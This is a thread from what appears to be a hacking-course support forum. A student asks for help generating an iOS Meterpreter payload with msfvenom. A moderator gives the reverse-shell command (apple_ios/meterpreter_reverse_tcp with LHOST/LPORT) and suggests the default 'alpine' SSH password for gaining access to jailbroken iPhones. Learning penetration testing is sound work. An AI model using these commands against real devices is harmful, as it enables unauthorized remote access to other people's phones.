- This topic has 10 replies, 2 voices, and was last updated 2 years, 6 months ago by Diego Pérez.
- AuthorPosts
- March 7, 2022 at 8:49 am #63235Saif91Participant
Hey guys,
I have been try from msfvenom to generate a payload with my public IP for apple_ios and seems doesn’t work or generate, and shows me an error. In the picture that I’ll post you can understand fully what I’ve been doing to generate.
waiting for your help.
Attachments:
You must be logged in to view attached files.March 7, 2022 at 5:31 pm #63241Diego PérezModeratorHi!
You are combining options that won’t work. If you want to create an iOS malicious app then you can set the architecutre to osx-app nor can select the format as exe, that’s a windows thing only, neither add .exe extension to the name of the file. So I’ll suggest to remove -a anf -f and use a file name without extensions for -o, msfvenom should add the proper values by default.
Greetings!
DiegoMarch 7, 2022 at 7:15 pm #63250Saif91ParticipantHey Diego,
Thanks for responding. I did get it now, so I did what you advise me to do. Delete -e and -f and used the file name without extension. But the output was saying the selected arch(osx-app) is incompatible. so I type msfvenom –list archs and that what I get.
Best regards,
- This reply was modified 2 years, 7 months ago by Saif91.
Attachments:
You must be logged in to view attached files.March 8, 2022 at 6:35 pm #63268Diego PérezModeratorHi!
I’ll suggest to read properly what I wrote above, I mentioned to delete -a because using osx-app is incorrect.Greetings!
DiegoMarch 8, 2022 at 6:55 pm #63269Saif91Participantit doesn’t work man, can you please write the code for me? or give me a example for the same payload!
March 9, 2022 at 5:58 pm #63291Diego PérezModeratorHi!
I have already told what you need to remove, so if you follow what I mentioned you would just run a command like:
msfvenom -p apple_ios/meterpreter_reverse_tcp LHOST=ip LPORT=port -f myfileWhy do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or ipad.Thanks!
Diego- This reply was modified 2 years, 6 months ago by Diego Pérez.
March 9, 2022 at 6:06 pm #63293March 9, 2022 at 6:19 pm #63296Saif91ParticipantWhy do you say it doesn’t work? What’s the problem? Can you share the last command used, the rsult and explain the problem?
Also explain what exactly do you expect to get here because msfvenom will not create a malicious .ipa file if that’s what you are trying to do, it will be just a script but in order to run it you would need a jailbroken iphone or iPad.I expect from msfvenom to create payload and make a backdooring with images or link or anything. if that wouldn’t work. how to make a backdooring in iOS or gaining access in iPhone.
Attachments:
You must be logged in to view attached files.March 10, 2022 at 4:36 pm #63334Diego PérezModeratorHi!
For iPhones, the process is harder, because Apple does not let its users to install applications outside the App Store, so what you can do in case of iOS is to try and scan it as shown in the course to check if it has any vulnerable service on open ports using Zenmap or any other vulnerability scanner, though I don’t think that you will get that much from the scan results if the phone wasn’t jailbroken, but it’s worth to try and see. Also, if the iPhone was jailbroken, then the procedure will be a lot easier (Take for example the SSH service running on port 22 with a default password of Alpine). There are other social engineering techniques that can be used to gain access, but they’re not very realistic and it’s not worth even to try them sometimes.
Greetings!
DiegoMarch 10, 2022 at 8:20 pm #63341Saif91ParticipantHey Diego,
thank you for pairing with me. best moderator ever
Best regards,
March 11, 2022 at 7:02 pm #63356Diego PérezModeratorYou’re welcome!
Greetings!
Diego - AuthorPosts
- You must be logged in to reply to this topic.